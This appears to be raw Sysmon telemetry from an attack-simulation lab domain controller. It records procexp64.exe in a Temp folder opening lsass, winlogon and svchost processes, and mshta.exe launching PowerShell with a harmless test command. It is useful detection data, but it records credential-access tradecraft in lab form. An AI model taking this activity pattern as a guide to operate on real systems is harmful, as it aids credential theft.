34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787305Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787304Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787303Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787302Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787301Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787300Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787299Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787298Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787297Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787296Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787295Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787294Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787293Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787292Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787291Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787290Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787289Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.627{732C744F-151A-600B-1600-00000000A301}15281680C:\Windows\system32\svchost.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787288Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.627{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787287Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.611{732C744F-323A-6010-CAA2-00000000A301}29125764C:\Windows\system32\conhost.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787286Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.564{732C744F-17DF-600B-9401-00000000A301}5084884C:\Windows\system32\csrss.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000787285Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.564{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787284Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.564{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787283Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.564{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787282Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.564{732C744F-17DF-600B-9401-00000000A301}5084884C:\Windows\system32\csrss.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000787281Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.564{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787280Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.564{732C744F-323A-6010-C8A2-00000000A301}63164192C:\Windows\SysWOW64\mshta.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\System32\windows.storage.dll+1240e6(wow64)|C:\Windows\System32\windows.storage.dll+123da1(wow64)|C:\Windows\System32\windows.storage.dll+123e73(wow64)|C:\Windows\System32\windows.storage.dll+124b45(wow64)|C:\Windows\System32\windows.storage.dll+1239f1(wow64)|C:\Windows\System32\windows.storage.dll+125d40(wow64)|C:\Windows\System32\windows.storage.dll+125fbc(wow64)|C:\Windows\System32\windows.storage.dll+1258a5(wow64)|C:\Windows\System32\shell32.dll+1a82b4(wow64)|C:\Windows\System32\shell32.dll+1a818e(wow64)|C:\Windows\System32\shell32.dll+13be0a(wow64)|C:\Windows\System32\shcore.dll+2fffa(wow64) 154100x8000000000000000787279Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.571{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 52455ea6-5921-4614-baef-c4d94b254f13; Start-Sleep -Seconds 2; 